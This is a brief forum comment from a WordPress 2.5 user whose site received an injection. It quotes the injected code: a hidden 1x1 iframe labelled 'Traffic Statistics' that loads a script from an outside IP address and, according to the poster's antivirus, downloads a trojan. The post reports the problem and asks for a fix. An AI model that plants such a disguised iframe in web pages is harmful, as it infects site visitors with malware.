I have WP 2.5 and no “strange” plugins and got the same injection today… looks like this <!-- Traffic Statistics --> <iframe src=https://xx.xxx.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->
and of course it downloads a trojan… my AV told me… still no fix for this?